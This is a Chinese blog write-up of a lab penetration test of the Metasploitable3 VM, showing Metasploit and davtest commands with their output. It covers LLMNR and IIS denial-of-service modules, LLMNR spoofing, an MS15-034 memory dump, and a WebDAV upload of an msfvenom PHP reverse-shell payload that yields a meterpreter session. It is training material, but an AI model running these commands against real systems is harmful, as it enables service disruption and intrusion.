渗透测试实例:Metasploitable3靶机

最新推荐文章于 2024-06-20 14:37:10 发布
最新推荐文章于 2024-06-20 14:37:10 发布
阅读量4k 收藏 29
点赞数 5
分类专栏: 渗透测试 文章标签: kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxy123_com/article/details/113760983
版权

实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20
实验目的:对Metasploitable3靶机进行渗透测试
实验步骤:
(一),对靶机进行扫描
1,使用Neuss对靶机进行扫描
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
2,查看靶机服务是否正常运行
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述3,开启metasploit框架
使用nmtp对靶机进行扫描
在这里插入图片描述

msf6 > db_nmap -A -T4 192.168.22.20

在这里插入图片描述(二),进行渗透
1,LLMNR缓冲区溢出DOS攻击
在这里插入图片描述

msf6 > search  llmnr              根据提供的信息来查找相应的模块

Matching Modules
================

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  auxiliary/dos/windows/llmnr/ms11_030_dnsapi  2011-04-12       normal  No     Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
   1  auxiliary/scanner/llmnr/query                                 normal  No     LLMNR Query
   2  auxiliary/server/capture/smb                                  normal  No     Authentication Capture: SMB
   3  auxiliary/spoof/llmnr/llmnr_response                          normal  No     LLMNR Spoofer


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/spoof/llmnr/llmnr_response

msf6 > use auxiliary/dos/windows/llmnr/ms11_030_dnsapi     调用模块
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > set     查看设置项

Global
======

No entries in data store.

Module: dos/windows/llmnr/ms11_030_dnsapi
=========================================

  Name       Value
  ----       -----
  CHOST      
  CPORT      
  RHOSTS     224.0.0.252
  RPORT      5355
  VERBOSE    false
  WORKSPACE  

msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > show options   查看必要的设置

Module options (auxiliary/dos/windows/llmnr/ms11_030_dnsapi):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  224.0.0.252      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   5355             yes       The target port (UDP)

msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > set rhosts 192.168.22.20   指定攻击目标的IP地址
rhosts => 192.168.22.20
msf6 auxiliary(dos/windows/llmnr/ms11_030_dnsapi) > run                   执行
[*] Running module against 192.168.22.20

[*] Sending Ipv6 LLMNR query to 192.168.22.20
[*] Sending Ipv4 LLMNR query to 192.168.22.20
[*] Note, in a default configuration, the service will restart automatically twice.
[*] In order to ensure it is completely dead, wait up to 5 minutes and run it again.
[*] Auxiliary module execution completed

在这里插入图片描述在这里插入图片描述
2,llmnr欺骗(可进行监控)

msf6 > use auxiliary/spoof/llmnr/llmnr_response                调用模块
msf6 auxiliary(spoof/llmnr/llmnr_response) > set                 查看设置项

Global
======

No entries in data store.

Module: spoof/llmnr/llmnr_response
==================================

  Name                Value
  ----                -----
  GATEWAY_PROBE_HOST  8.8.8.8
  GATEWAY_PROBE_PORT  
  INTERFACE           
  REGEX               .*
  SECRET              1297303073
  SPOOFIP             
  TIMEOUT             500
  TTL                 30
  VERBOSE             false
  WORKSPACE           

msf6 auxiliary(spoof/llmnr/llmnr_response) > show options    查看必要的设置项

Module options (auxiliary/spoof/llmnr/llmnr_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      .*               yes       Regex applied to the LLMNR Name to determine if spoofed reply is sent
   SPOOFIP                     yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data
   TTL        30               no        Time To Live for the spoofed response


Auxiliary action:

   Name     Description
   ----     -----------
   Service  Run LLMNR spoofing service


msf6 auxiliary(spoof/llmnr/llmnr_response) > set spoofip 192.168.22.20    设置攻击目标的IP地址
spoofip => 192.168.22.20
msf6 auxiliary(spoof/llmnr/llmnr_response) > run                        执行
[*] Auxiliary module running as background job 0.
msf6 auxiliary(spoof/llmnr/llmnr_response) > 
[*] LLMNR Spoofer started. Listening for LLMNR requests with REGEX "(?-mix:.*)" ...
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
msf6 auxiliary(spoof/llmnr/llmnr_response) > [+] 192.168.22.20    llmnr - metasploitable3. matches regex, responding with 192.168.22.20
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.20    llmnr - metasploitable3. matches regex, responding with 192.168.22.20
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.1     llmnr - wpad. matches regex, responding with 192.168.22.20
[+] 192.168.22.20    llmnr - metasploitable3. matches regex, responding with 192.168.22.20
先Ctrl+C退出
msf6 auxiliary(spoof/llmnr/llmnr_response) > jobs    查看后台进程

Jobs
====

  Id  Name                                   Payload  Payload opts
  --  ----                                   -------  ------------
  0   Auxiliary: spoof/llmnr/llmnr_response           

msf6 auxiliary(spoof/llmnr/llmnr_response) > kill 0     杀死后台的监控进程(否则会一直进行监控)
[*] Stopping the following job(s): 0
[*] Stopping job 0

在这里插入图片描述在这里插入图片描述在这里插入图片描述3,APS栈耗尽拒绝服务攻击
在这里插入图片描述

msf6 auxiliary(dos/windows/ftp/iis_list_exhaustion) > search  Microsoft IIS    根据信息查找相应得到模块

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   auxiliary/admin/http/iis_auth_bypass                 2010-07-02       normal     No     MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
   1   auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof         2010-12-21       normal     No     Microsoft IIS FTP Server Encoded Response Overflow Trigger
   2   auxiliary/dos/windows/ftp/iis_list_exhaustion        2009-09-03       normal     No     Microsoft IIS FTP Server LIST Stack Exhaustion
   3   auxiliary/dos/windows/http/ms10_065_ii6_asp_dos      2010-09-14       normal     No     Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
   4   auxiliary/scanner/http/iis_internal_ip                                normal     No     Microsoft IIS HTTP Internal IP Disclosure
   5   auxiliary/scanner/http/iis_shortname_scanner                          normal     Yes    Microsoft IIS shortname vulnerability scanner
   6   auxiliary/scanner/http/owa_iis_internal_ip           2012-12-17       normal     No     Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure
   7   exploit/windows/ftp/ms09_053_ftpd_nlst               2009-08-31       great      No     MS09-053 Microsoft IIS FTP Server NLST Response Overflow
   8   exploit/windows/http/umbraco_upload_aspx             2012-06-28       excellent  No     Umbraco CMS Remote Command Execution
   9   exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual     Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   10  exploit/windows/iis/iis_webdav_upload_asp            2004-12-31       excellent  No     Microsoft IIS WebDAV Write Access Code Execution
   11  exploit/windows/iis/ms01_023_printer                 2001-05-01       good       Yes    MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow
   12  exploit/windows/iis/ms01_026_dbldecode               2001-05-15       excellent  Yes    MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution
   13  exploit/windows/iis/ms01_033_idq                     2001-06-18       good       No     MS01-033 Microsoft IIS 5.0 IDQ Path Overflow
   14  exploit/windows/iis/ms02_018_htr                     2002-04-10       good       No     MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
   15  exploit/windows/iis/ms02_065_msadc                   2002-11-20       normal     Yes    MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow
   16  exploit/windows/iis/ms03_007_ntdll_webdav            2003-05-30       great      Yes    MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
   17  exploit/windows/iis/msadc                            1998-07-17       excellent  Yes    MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
   18  exploit/windows/isapi/ms00_094_pbserver              2000-12-04       good       Yes    MS00-094 Microsoft IIS Phone Book Service Overflow
   19  exploit/windows/isapi/ms03_022_nsiislog_post         2003-06-25       good       Yes    MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
   20  exploit/windows/isapi/ms03_051_fp30reg_chunked       2003-11-11       good       Yes    MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
   21  exploit/windows/isapi/rsa_webagent_redirect          2005-10-21       good       Yes    Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
   22  exploit/windows/isapi/w3who_query                    2004-12-06       good       Yes    Microsoft IIS ISAPI w3who.dll Query String Overflow
   23  exploit/windows/ssl/ms04_011_pct                     2004-04-13       average    No     MS04-011 Microsoft Private Communications Transport Overflow


Interact with a module by name or index. For example info 23, use 23 or use exploit/windows/ssl/ms04_011_pct
msf6 auxiliary(dos/windows/ftp/iis_list_exhaustion) > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos    调用模块
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > show options     查看必要的设置

Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   80               yes       The target port (TCP)
   URI     /page.asp        yes       URI to request
   VHOST                    no        The virtual host name to use in requests

msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > set rhosts 192.168.22.20     攻击目标的IP地址
rhosts => 192.168.22.20
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > set rport 8022             攻击目标的端口号
rport => 8022
msf6 auxiliary(dos/windows/http/ms10_065_ii6_asp_dos) > run                  执行
[*] Running module against 192.168.22.20

[*] 192.168.22.20:8022 - Attacking http://192.168.22.20:8022/page.asp

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述访问靶机的web页面感觉到明显的延时,并且靶机也产生卡顿,但是攻击并不稳定。

4,Microsoft IIS短名称漏洞扫描器

msf6 auxiliary(scanner/http/iis_internal_ip) > use auxiliary/scanner/http/iis_shortname_scanner   调用模块
msf6 auxiliary(scanner/http/iis_shortname_scanner) > set          查看设置项

Global
======

No entries in data store.

Module: scanner/http/iis_shortname_scanner
==========================================

  Name                          Value
  ----                          -----
  DOMAIN                        WORKSTATION
  DigestAuthIIS                 true
  FingerprintCheck              true
  HTTP::header_folding          false
  HTTP::method_random_case      false
  HTTP::method_random_invalid   false
  HTTP::method_random_valid     false
  HTTP::pad_fake_headers        false
  HTTP::pad_fake_headers_count  0
  HTTP::pad_get_params          false
  HTTP::pad_get_params_count    16
  HTTP::pad_method_uri_count    1
  HTTP::pad_method_uri_type     space
  HTTP::pad_post_params         false
  HTTP::pad_post_params_count   16
  HTTP::pad_uri_version_count   1
  HTTP::pad_uri_version_type    space
  HTTP::uri_dir_fake_relative   false
  HTTP::uri_dir_self_reference  false
  HTTP::uri_encode_mode         hex-normal
  HTTP::uri_fake_end            false
  HTTP::uri_fake_params_start   false
  HTTP::uri_full_url            false
  HTTP::uri_use_backslashes     false
  HTTP::version_random_invalid  false
  HTTP::version_random_valid    false
  HttpClientTimeout             
  HttpPassword                  
  HttpRawHeaders                
  HttpTrace                     false
  HttpTraceColors               red/blu
  HttpTraceHeadersOnly          false
  HttpUsername                  
  PATH                          /
  Proxies                       
  RHOSTS                        
  RPORT                         80
  SSL                           false
  SSLVersion                    Auto
  THREADS                       20
  UserAgent                     Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  VERBOSE                       false
  VHOST                         
  WORKSPACE                     

msf6 auxiliary(scanner/http/iis_shortname_scanner) > set rhosts 192.168.22.20     攻击目标的IP地址
rhosts => 192.168.22.20
msf6 auxiliary(scanner/http/iis_shortname_scanner) > show options      查看必要的设置

Module options (auxiliary/scanner/http/iis_shortname_scanner):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       The base path to start scanning from
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.22.20    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  20               yes       Number of threads to use
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(scanner/http/iis_shortname_scanner) > run    执行
[*] Running module against 192.168.22.20

[*] Scanning in progress...
[+] Found 1 directories
[+] http://192.168.22.20/aspnet*~1
[+] Found 2 files
[+] http://192.168.22.20/index*~1.htm*
[+] http://192.168.22.20/six_of*~1.zip*
[*] Auxiliary module execution completed

在这里插入图片描述在这里插入图片描述5,DAVtest上传漏洞

┌──(root💀kali)-[~]
└─# davtest -url http://192.168.22.20:8585/uploads/          先上传文件
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://192.168.22.20:8585/uploads
********************************************************
NOTE    Random string for this session: QlP180WUMS
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS
********************************************************
 Sending test files
PUT     shtml   SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.shtml
PUT     jhtml   SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jhtml
PUT     asp     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.asp
PUT     html    SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
PUT     jsp     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jsp
PUT     cgi     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cgi
PUT     pl      SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.pl
PUT     txt     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
PUT     php     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
PUT     cfm     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cfm
PUT     aspx    SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.aspx
********************************************************
 Checking for test file execution
EXEC    shtml   FAIL
EXEC    jhtml   FAIL
EXEC    asp     FAIL
EXEC    html    SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
EXEC    jsp     FAIL
EXEC    cgi     FAIL
EXEC    pl      FAIL
EXEC    txt     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
EXEC    php     SUCCEED:        http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
EXEC    cfm     FAIL
EXEC    aspx    FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.shtml
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jhtml
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.asp
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.jsp
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cgi
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.pl
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.cfm
PUT File: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.aspx
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.html
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.txt
Executes: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/davtest_QlP180WUMS.php

┌──(root💀kali)-[~]
└─# msfvenom -p php/meterpreter-reverse_tcp LHOST=192.168.22.130  LPORT=888  -f raw >demon.php    生成攻击载荷(lhost是本机监听IP地址,lport是本机监听端口号)
                                                                                              
┌──(root💀kali)-[~]
└─# davtest -url http://192.168.22.20:8585/uploads/ -uploadfile demon.php -uploadloc DavTestDir_QlP180WUMS/8888.php    上传攻击载荷( DavTestDir_QlP180WUMS为访问网页上的路径)
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://192.168.22.20:8585/uploads
********************************************************
 unless  Uploading file
Upload succeeded: http://192.168.22.20:8585/uploads/DavTestDir_QlP180WUMS/8888.php

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

msf6 > use exploit/multi/handler                     调用模块
[*] Using configured payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp   使用自己配置的payload
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.22.130    本机IP地址(需要和payload中相同)
lhost => 192.168.22.130
msf6 exploit(multi/handler) > set lport 888  本机监听地址(需要和payload中设置的相同)
lport => 888
msf6 exploit(multi/handler) > run        执行,(在执行后需点击上传的文件)

[*] Started reverse TCP handler on 192.168.22.130:888

在这里插入图片描述在这里插入图片描述

msf6 exploit(multi/handler) > run   发现在点击web上上传的文件后渗透成功

[*] Started reverse TCP handler on 192.168.22.130:888 
[*] Meterpreter session 2 opened (192.168.22.130:888 -> 192.168.22.20:55520) at 2021-02-08 17:42:08 +0800

meterpreter > ls               测试,已经拿到shell
Listing: C:\wamp\www\uploads\DavTestDir_QlP180WUMS
==================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  34280  fil   2021-02-08 17:32:37 +0800  8888.php
100666/rw-rw-rw-  44     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.asp
100666/rw-rw-rw-  44     fil   2021-02-08 15:29:24 +0800  davtest_QlP180WUMS.aspx
100666/rw-rw-rw-  42     fil   2021-02-08 15:29:24 +0800  davtest_QlP180WUMS.cfm
100666/rw-rw-rw-  66     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.cgi
100666/rw-rw-rw-  26     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.html
100666/rw-rw-rw-  37     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.jhtml
100666/rw-rw-rw-  37     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.jsp
100666/rw-rw-rw-  24     fil   2021-02-08 15:29:24 +0800  davtest_QlP180WUMS.php
100666/rw-rw-rw-  66     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.pl
100666/rw-rw-rw-  179    fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.shtml
100666/rw-rw-rw-  19     fil   2021-02-08 15:29:23 +0800  davtest_QlP180WUMS.txt

meterpreter >

在这里插入图片描述
6, HTTP协议栈请求处理。系统内存信息披露

msf6 > search ms15_034     查找相应模块

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options     查看必要选项

Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   SUPPRESS_REQUEST  true             yes       Suppress output of the requested resource
   TARGETURI         /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS           1                yes       The number of concurrent threads (max one per host)
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.22.20   指定攻击目标IP地址
rhosts => 192.168.22.20
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run         执行
 
[+] Target may be vulnerable...
[+] Stand by...
[-] Memory dump start position not found, dumping all data instead

[+] Memory contents:
48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64    |HTTP/1.1 400 Bad|
20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e    | Request..Conten|
74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d    |t-Type: text/htm|
6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73    |l; charset=us-as|
63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63    |cii..Server: Mic|
72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32    |rosoft-HTTPAPI/2|
2e 30 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30    |.0..Date: Mon, 0|
38 20 46 65 62 20 32 30 32 31 20 31 30 3a 31 33    |8 Feb 2021 10:13|
3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74    |:04 GMT..Connect|
69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74    |ion: close..Cont|
65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 36 0d    |ent-Length: 346.|
0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d    |...<!DOCTYPE HTM|
4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43    |L PUBLIC "-//W3C|
2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f    |//DTD HTML 4.01/|
2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e    |/EN""http://www.|
77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f    |w3.org/TR/html4/|
73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48    |strict.dtd">..<H|
54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45    |TML><HEAD><TITLE|
3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49    |>Bad Request</TI|
54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50    |TLE>..<META HTTP|
2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d    |-EQUIV="Content-|
54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74    |Type" Content="t|
65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65    |ext/html; charse|
74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45    |t=us-ascii"></HE|
41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42    |AD>..<BODY><h2>B|
61 64 20 52 65 71 75 65 73 74 20 2d 20 52 65 71    |ad Request - Req|
75 65 73 74 20 54 6f 6f 20 4c 6f 6e 67 3c 2f 68    |uest Too Long</h|
32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20    |2>..<hr><p>HTTP |
45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 73    |Error 400. The s|
69 7a 65 20 6f 66 20 74 68 65 20 72 65 71 75 65    |ize of the reque|
73 74 20 68 65 61 64 65 72 73 20 69 73 20 74 6f    |st headers is to|
6f 20 6c 6f 6e 67 2e 3c 2f 70 3e 0d 0a 3c 2f 42    |o long.</p>..</B|
4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a             |ODY></HTML>..|


[+] Memory dump saved to /root/.msf4/loot/20210208181305_default_192.168.22.20_iis.ms15034_283153.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

在这里插入图片描述在这里插入图片描述7,HTTP协议栈请求处理拒绝服务

msf6 > search ms15_034      查看相应模块

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump

msf6 > use  auxiliary/dos/http/ms15_034_ulonglongadd
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > show options     查看必要的设置

Module options (auxiliary/dos/http/ms15_034_ulonglongadd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.22.20    指定攻击目标IP地址
rhosts => 192.168.22.20
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run     执行

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > 
[*] 192.168.22.20 - Meterpreter session 2 closed.  Reason: Died

在这里插入图片描述在这里插入图片描述在这里插入图片描述【至此,渗透测试Metasploitable3靶机实验完成】

连某人
关注
  • 5
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)
richardjung的专栏
01-22 1623
metasploitable3靶场使用msf6实操
针对 Metasploitable 3 的渗透测试
07-31
针对 Metasploitable 3 的渗透测试-漏洞银行大咖面对面5-Demon
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透2 —制作恶意 deb 软件包来触发后门
最新发布
天下著书立传者,皆为我师
06-20 932
通过msfvenonom生成含病毒和木马到软件包,目标机下载含木马的deb软件,完成与msf相应的通信
metasploitable3靶机
雨泽网络工作室
08-23 1934
Metasploitable3靶机攻击 注:这些密码都是参考网站https://github.com/rapid7/metasploitable3/wiki/Configuration#credentials 21端口ftp 使用nmap扫描发现21端口打开 通过msfconsole 调出metasploit 使用ftp_login模块 使用set设置参数 使用run进行攻击 登录 22端口ssh 通过nmap扫描发现22端口开启 爆破s..
Metasploitable 3 实战渗透测试
耿先生的博客
02-07 1537
Metasploitable 3 实战渗透测试 环境准备 靶机Metasploitable 3 链接:https://pan.baidu.com/s/13kcqMwrUoxgE6_vxD8L0wA 提取码:66ws 所有文件同时解压就可以使用VMware workstation打开了 IP:192.168.22.139 攻击端:kali Linux IP:192.168.22.129 实验流程参考 PTES 渗透执行标准 1.前期交互阶段 前期交互阶段通常是由你与客户组织进行讨论,来确定渗透测试的范围
Metasploitable 3
05-24
https://www.loop0day.site/2019/05/24/国内环境搭建Metasploitable-3靶机/
Metasploitable3渗透测试实战
温柔小薛的博客
02-17 4254
这是一个著名的靶场Metasploitable3,关于靶机搭建网上文章非常多,这里我就不再写了,但是关于漏洞挖掘没有什么文章,而且这个靶场windows版本和linux版本还有差别,我这里写一些简单的吧,自己就挖到这个程度了,有不对的地方还请前辈高人指点一二 目录1综述2.渗透过程2.1渗透路径说明2.1.1全端口扫描/服务发现2.1.2目录扫描2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。2.1.4二、sql注入2.1.5三、phpmyadmin远程php代码执行2.1.6四、文件上传漏
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
Metasploitable3靶机
05-09
Metasploitable3是一个win2008的靶机---Metasploitable 3简介 Metasploitable 3 内置一些安全机制,比如防火墙,权限设置等。此外,Metasploitable 3中有些漏洞在 Metasploit 中并没有漏洞利用模块,需要手工挖掘。...
web渗透测试靶机(新手)
05-07
